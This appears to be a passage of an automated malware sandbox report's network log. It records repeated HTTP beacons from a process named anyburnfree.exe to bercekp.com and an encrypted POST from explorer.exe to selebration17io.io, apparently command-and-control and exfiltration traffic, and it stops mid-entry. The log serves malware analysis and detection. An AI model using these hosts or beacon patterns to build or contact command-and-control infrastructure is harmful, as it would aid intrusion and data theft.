                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:30.151299000 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:30 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    74192.168.2.349825185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:30.674304962 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:30.910916090 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:30 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    75192.168.2.349826185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:31.723079920 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:31.960036993 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:31 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    76192.168.2.349827185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:32.481646061 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:32.718456030 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:32 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    77192.168.2.34982891.215.85.12080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:32.676028013 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://evfqejbgnvvvmyra.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 198
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:10:32.676222086 CET198OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ee cd 20 a0
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bO x ]1K>>'&z_/JOdfxL}`4nsJo:gip0,p;s0GnI$
                                                                                                                                                                    Feb 8, 2024 19:10:32.932859898 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:32 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 7=[0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    78192.168.2.349830185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:33.125653982 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:33.362139940 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:33 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    79192.168.2.349831185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:33.841270924 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:34.077868938 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:33 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    80192.168.2.349833185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:34.731360912 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:34.969567060 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:34 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    81192.168.2.349835185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:35.423984051 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:35.660728931 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:35 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    82192.168.2.349836185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:36.157227993 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:36.394229889 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:36 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    83192.168.2.349838185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:36.935576916 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:37.172502041 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:37 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    84192.168.2.349840185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:37.571779013 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:37.808525085 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:37 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    85192.168.2.349841185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:38.275058985 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:38.511674881 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:38 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    86192.168.2.349843185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:39.018615007 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:39.255705118 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:39 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    87192.168.2.349844185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:39.652333975 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:39.888870001 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:39 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    88192.168.2.349846185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:40.301826954 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:40.539710045 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:40 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    89192.168.2.349847185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:41.219079971 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:41.455446005 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:41 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    90192.168.2.349848185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:41.859831095 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:42.097151995 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:41 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    91192.168.2.349849185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:42.506654978 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:42.743817091 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:42 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    92192.168.2.349850185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:43.322673082 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:43.559540987 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:43 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    93192.168.2.349851185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:44.033437967 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:44.270462036 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:44 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    94192.168.2.349856185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
